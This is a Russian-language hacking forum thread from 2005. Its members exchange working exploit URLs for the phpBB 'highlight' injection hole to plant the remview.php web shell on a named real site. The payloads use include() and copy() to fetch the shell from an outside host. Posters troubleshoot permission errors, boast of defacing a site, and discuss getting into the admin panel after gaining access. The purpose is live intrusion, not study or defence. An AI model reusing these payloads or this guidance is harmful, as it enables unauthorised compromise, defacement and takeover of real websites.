Вопрос про заливку шелла через уязвимость в highligh

Discussion in 'Песочница' started by rsha1988, 12 Jan 2005.

  1. Xalegi

    Xalegi Elder - Старейшина

    Joined:
    24 Nov 2004
    Messages:
    109
    Likes Received:
    4
    Reputations:
    6
    хмм... ти рмивиев качал с этого сайта?
     
  2. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    Помойму да (точно не помню), и эта фигня у меня уже не в первый раз!
     
  3. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    Взломал один сайт и вот что там написали:

    Колонка редактора

    С нашим любимым сайтом позабавлялась одна нискосортная единица рода человеческого. Причем, скажу вам честно, крайне невовремя. Хоть на выходных ерундой страдал бы чтоли?

    Некоторое время будут недоступны несколько разделов.

    Но нет причин к беспокойству — у сайта есть бекап. Так что это вопрос времени.

    Всем спасибо, даже тебе, дурачек. Буду знать, что мир не без мудаков.
    ___________________________________________
    Он меня обидил!
    Хотябы поблагодарил за то что я сломал его дерьмо... ;)
     
  4. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    Люди, ну чего такое блин, ну не хочет:
    http://kneu.net.ua/forum/viewtopic.php?t=14&xxx=http://salogta.narod.ru/remview.php?c=d&d=/usr/local/psa/home/vhosts/kneu.net.ua/httpdocs/forum/images/avatars/gallery&highlight=%2527.include($_GET[xxx]).include%2527
    Ну кто знает что я не правильно делаю???
     
  5. illusion

    illusion Banned

    Joined:
    7 Dec 2004
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    ты не дописал имя скрипта...
    И вообще, запрос ошибочный!
    Такой надо юзать!

    viewtopic.php?a=http://твой_ремотер&b=твоё_имя_файла&t=1&highlight=%2527%252ecopy($_GET[a],$_GET)%252e%2527
     
    #25 illusion, 13 Jan 2005
    Last edited: 13 Jan 2005
  6. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    Ну не получаеться даже таким способом!
    http://kneu.net.ua/forum/viewtopic.php?a=http://salogta.narod.ru/remview.php&b=help.php&t=14&highlight=%2527%252ecopy($_GET[a],$_GET)%252e%2527
    Смотри- http://kneu.net.ua/forum/help.php
     
  7. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    При загрузки пишет - Warning: copy(help.php): failed to open stream: Permission denied in /usr/local/psa/home/vhosts/kneu.net.ua/httpdocs/forum/viewtopic.php(1104) : regexp code on line 1 :confused:
     
  8. Xalegi

    Xalegi Elder - Старейшина

    Joined:
    24 Nov 2004
    Messages:
    109
    Likes Received:
    4
    Reputations:
    6
    дык.. у меня такая же проблема.. вточности... тоже самое пишет =(((

    может не правильный ремвиев? так как когда только появилось видео.. я брал ремвиев с сайта www.supermegalox.narod.ru/remview.php и ВСЁ РАБОТАЛО !!! (но сейчас по-моему сайт прикрыли)

    мож на античатовском ремвиеве надо что-то подправить?
     
  9. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    Может!
    Я скачивал и з других сайтов шелл и он тоже не работал..
    Так что ктонибуть дайте работающий remview.php! плизззззззззз. :D
     
  10. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    А мне вобще почемуто не один файл не залить..
     
  11. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    remview.php- а как можно загрузить не в корневую папку а например в папку с аватарами?
     
  12. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Какой коммандой можно посматреть какие пипки открыты на запись??
     
  13. dull

    dull New Member

    Joined:
    6 Jan 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    ну залил я remview ,да ftp доступ есть ,кроме дифейса что можно еще предпринять
     
  14. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    Ну поидее можеш залесть в алминку сайта (если пассы не в базе данных). ;)
     
Loading...